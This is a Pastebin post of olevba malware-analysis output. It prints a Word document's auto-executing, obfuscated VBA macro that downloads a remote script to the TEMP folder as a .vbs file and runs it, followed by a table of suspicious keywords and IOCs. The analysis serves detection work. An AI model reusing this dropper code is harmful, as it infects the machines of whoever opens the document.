SHARE
TWEET

Malicious Word macro

dynamoo Aug 4th, 2015 252 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. MHT:MASI---V malware.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.doc
  10. Type: MHTML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: None - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub BHJvsafccc()
  16. zzzzzccsdc
  17. End Sub
  18. Sub AutoOpen()
  19.     BHJvsafccc
  20. End Sub
  21. Sub Workbook_Open()
  22.     BHJvsafccc
  23. End Sub
  24. -------------------------------------------------------------------------------
  25. VBA MACRO nxc.bas
  26. in file: None - OLE stream: u'VBA/nxc'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. Sub zzzzzccsdc()
  29. Dim bpXIphzr, ttRrcQMW, ONsvPyQD As String
  30. bpXIphzr = "           MQPPSA               "
  31. ttRrcQMW = LTrim(bpXIphzr)
  32. ONsvPyQD = RTrim(ttRrcQMW)
  33.  
  34. mkHJBcsdf = "TEMP"
  35. Dim KllIoMIA, mRUZKkkX, OmDyVeER As String
  36. KllIoMIA = "           LEFDRN               "
  37. mRUZKkkX = LTrim(KllIoMIA)
  38. OmDyVeER = RTrim(mRUZKkkX)
  39.  
  40. nBJaddff = "MSXML2.XMLHTTP"
  41. Dim gqwqjvQx, njifLsFU, vzQNJfmu As String
  42. gqwqjvQx = "           TJBGXF               "
  43. njifLsFU = LTrim(gqwqjvQx)
  44. vzQNJfmu = RTrim(njifLsFU)
  45.  
  46. Set pIHJIasdf = CreateObject(nBJaddff)
  47. Dim RFsQJoJK, bFwCsdgL, wGYoYkSM As String
  48. RFsQJoJK = "           WIICDV               "
  49. bFwCsdgL = LTrim(RFsQJoJK)
  50. wGYoYkSM = RTrim(bFwCsdgL)
  51.  
  52. pKKhbsac = "ttp"
  53. Dim IIeoErOJ, fEPEHbnO, uMAgYYHd As String
  54. IIeoErOJ = "           YIJTPD               "
  55. fEPEHbnO = LTrim(IIeoErOJ)
  56. uMAgYYHd = RTrim(fEPEHbnO)
  57.  
  58. yDTYuadf = "://pas"
  59. Dim lKcgemiT, UIELoylf, XvOxgJTX As String
  60. lKcgemiT = "           BTSWSM               "
  61. UIELoylf = LTrim(lKcgemiT)
  62. XvOxgJTX = RTrim(UIELoylf)
  63.  
  64. ihuHJJdsf = StrReverse(ChrW$(111) & ChrW$(99) & ChrW$(46) & ChrW$(110) & ChrW$(105) & ChrW$(98))
  65. Dim JlMkGXlV, enYmjOwo, aqpigQzU As String
  66. JlMkGXlV = "           MWQKIN               "
  67. enYmjOwo = LTrim(JlMkGXlV)
  68. aqpigQzU = RTrim(enYmjOwo)
  69.  
  70. YGHvvdf = StrReverse(ChrW$(61) & ChrW$(105) & ChrW$(63) & ChrW$(112) & ChrW$(104) & ChrW$(112) & ChrW$(46) & ChrW$(100) & ChrW$(97) & ChrW$(111) & ChrW$(108) & ChrW$(110))
  71. Dim czsPxhrZ, lexXJlAR, grYisvBT As String
  72. czsPxhrZ = "           KGICEA               "
  73. lexXJlAR = LTrim(czsPxhrZ)
  74. grYisvBT = RTrim(lexXJlAR)
  75.  
  76. mmmkMKNd = StrReverse(ChrW$(104)) + pKKhbsac + yDTYuadf + StrReverse(ChrW$(101) & ChrW$(116)) + ihuHJJdsf + StrReverse(ChrW$(119) & ChrW$(111) & ChrW$(100) & ChrW$(47) & ChrW$(109)) + YGHvvdf
  77. Dim jsfkixUg, XuWDmKby, nzEiIdjV As String
  78. jsfkixUg = "           HSKAQR               "
  79. XuWDmKby = LTrim(jsfkixUg)
  80. nzEiIdjV = RTrim(XuWDmKby)
  81.  
  82. VHVisdfw = mmmkMKNd + StrReverse(ChrW$(51) & ChrW$(75) & ChrW$(84) & ChrW$(53) & ChrW$(100) & ChrW$(89) & ChrW$(114) & ChrW$(48))
  83. Dim eyzBsPgn, kXiZkwno, MuwxaLpZ As String
  84. eyzBsPgn = "           KSADHZ               "
  85. kXiZkwno = LTrim(eyzBsPgn)
  86. MuwxaLpZ = RTrim(kXiZkwno)
  87.  
  88. Call pIHJIasdf.Open(StrReverse(ChrW$(84) & ChrW$(83) & ChrW$(79) & ChrW$(80)), VHVisdfw, False)
  89. Dim KDNLtWtz, tLSXYOod, jBvBocsc As String
  90. KDNLtWtz = "           MTFYHN               "
  91. tLSXYOod = LTrim(KDNLtWtz)
  92. jBvBocsc = RTrim(tLSXYOod)
  93.  
  94. pIHJIasdf.Send
  95. Dim npjkobMZ, xqnREEkR, kqQHVIGT As String
  96. npjkobMZ = "           MLQFXY               "
  97. xqnREEkR = LTrim(npjkobMZ)
  98. kqQHVIGT = RTrim(xqnREEkR)
  99.  
  100. dyEYTasd = StrReverse(ChrW$(116) & ChrW$(99) & ChrW$(101) & ChrW$(106) & ChrW$(98) & ChrW$(79) & ChrW$(109) & ChrW$(101) & ChrW$(116) & ChrW$(115) & ChrW$(121) & ChrW$(83) & ChrW$(101) & ChrW$(108) & ChrW$(105) & ChrW$(70) & ChrW$(46) & ChrW$(103) & ChrW$(110) & ChrW$(105) & ChrW$(116) & ChrW$(112) & ChrW$(105) & ChrW$(114) & ChrW$(99) & ChrW$(83))
  101. Dim xeQAcRYS, aVlXPBcR, MgpUAyDi As String
  102. xeQAcRYS = "           NKOFUN               "
  103. aVlXPBcR = LTrim(xeQAcRYS)
  104. MgpUAyDi = RTrim(aVlXPBcR)
  105.  
  106. Set nJHOsdff = CreateObject(dyEYTasd)
  107. Dim aLlTJBDR, EtIbnxxB, KMFeTiIU As String
  108. aLlTJBDR = "           HTPEYP               "
  109. EtIbnxxB = LTrim(aLlTJBDR)
  110. KMFeTiIU = RTrim(EtIbnxxB)
  111.  
  112.    yyYHJKsdfv = Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))
  113. Dim TGZPOwhL, JWgDsplr, eaaHDCwf As String
  114. TGZPOwhL = "           FYZAYD               "
  115. JWgDsplr = LTrim(TGZPOwhL)
  116. eaaHDCwf = RTrim(JWgDsplr)
  117.  
  118. Set casasddd = nJHOsdff.CreateTextFile(yyYHJKsdfv, 2)
  119. Dim jJUevPkl, sKKhLGGl, iLzAfLdw As String
  120. jJUevPkl = "           GPLURS               "
  121. sKKhLGGl = LTrim(jJUevPkl)
  122. iLzAfLdw = RTrim(sKKhLGGl)
  123.  
  124. casasddd.Write pIHJIasdf.responseText
  125. Dim HjjttiWj, msBbkESo, NuYMRVRa As String
  126. HjjttiWj = "           EFMMOX               "
  127. msBbkESo = LTrim(HjjttiWj)
  128. NuYMRVRa = RTrim(msBbkESo)
  129.  
  130. casasddd.Close
  131. Dim XNaeMehp, vshCEnBR, DzwnIsqd As String
  132. XNaeMehp = "           WLTCXT               "
  133. vshCEnBR = LTrim(XNaeMehp)
  134. DzwnIsqd = RTrim(vshCEnBR)
  135.  
  136. yytTcbcn = StrReverse(ChrW$(110) & ChrW$(111) & ChrW$(105) & ChrW$(116) & ChrW$(97) & ChrW$(99) & ChrW$(105) & ChrW$(108) & ChrW$(112) & ChrW$(112) & ChrW$(65) & ChrW$(46) & ChrW$(108) & ChrW$(108) & ChrW$(101) & ChrW$(104) & ChrW$(83))
  137. Dim HzSBMocU, zivzwCnK, ffqtVPRe As String
  138. HzSBMocU = "           LSUOQY               "
  139. zivzwCnK = LTrim(HzSBMocU)
  140. ffqtVPRe = RTrim(zivzwCnK)
  141.  
  142. Set chgdTYasd = CreateObject(yytTcbcn)
  143. chgdTYasd.Open Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))
  144. End Sub
  145.  
  146.  
  147. -------------------------------------------------------------------------------
  148. VBA MACRO Class1.cls
  149. in file: None - OLE stream: u'VBA/Class1'
  150. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  151. (empty macro)
  152. -------------------------------------------------------------------------------
  153. VBA MACRO Class2.cls
  154. in file: None - OLE stream: u'VBA/Class2'
  155. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  156. (empty macro)
  157. -------------------------------------------------------------------------------
  158. VBA MACRO Class3.cls
  159. in file: None - OLE stream: u'VBA/Class3'
  160. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  161. (empty macro)
  162. -------------------------------------------------------------------------------
  163. VBA MACRO Class4.cls
  164. in file: None - OLE stream: u'VBA/Class4'
  165. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  166. (empty macro)
  167. -------------------------------------------------------------------------------
  168. VBA MACRO Class5.cls
  169. in file: None - OLE stream: u'VBA/Class5'
  170. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  171. (empty macro)
  172. -------------------------------------------------------------------------------
  173. VBA MACRO Class6.cls
  174. in file: None - OLE stream: u'VBA/Class6'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176. (empty macro)
  177. -------------------------------------------------------------------------------
  178. VBA MACRO Class7.cls
  179. in file: None - OLE stream: u'VBA/Class7'
  180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  181. (empty macro)
  182. -------------------------------------------------------------------------------
  183. VBA MACRO Class8.cls
  184. in file: None - OLE stream: u'VBA/Class8'
  185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  186. (empty macro)
  187. -------------------------------------------------------------------------------
  188. VBA MACRO Class9.cls
  189. in file: None - OLE stream: u'VBA/Class9'
  190. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  191. (empty macro)
  192. -------------------------------------------------------------------------------
  193. VBA MACRO Class10.cls
  194. in file: None - OLE stream: u'VBA/Class10'
  195. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  196. (empty macro)
  197. -------------------------------------------------------------------------------
  198. VBA MACRO Class11.cls
  199. in file: None - OLE stream: u'VBA/Class11'
  200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  201. (empty macro)
  202. +------------+----------------------+-----------------------------------------+
  203. | Type       | Keyword              | Description                             |
  204. +------------+----------------------+-----------------------------------------+
  205. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  206. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  207. | Suspicious | Open                 | May open a file                         |
  208. | Suspicious | CreateObject         | May create an OLE object                |
  209. | Suspicious | ChrW                 | May attempt to obfuscate specific       |
  210. |            |                      | strings                                 |
  211. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  212. |            |                      | strings                                 |
  213. | Suspicious | CreateTextFile       | May create a text file                  |
  214. | Suspicious | Environ              | May read system environment variables   |
  215. | Suspicious | Write                | May write to a file (if combined with   |
  216. |            |                      | Open)                                   |
  217. | Suspicious | Msxml2.XMLHTTP       | May download files from the Internet    |
  218. | Suspicious | Shell                | May run an executable file or a system  |
  219. |            |                      | command (obfuscation: VBA expression)   |
  220. | Suspicious | Shell.Application    | May run an application (if combined     |
  221. |            |                      | with CreateObject) (obfuscation: VBA    |
  222. |            |                      | expression)                             |
  223. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  224. |            | Strings              | may be used to obfuscate strings        |
  225. |            |                      | (option --decode to see all)            |
  226. | IOC        | nnjBHccs.vbs         | Executable file name (obfuscation: VBA  |
  227. |            |                      | expression)                             |
  228. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top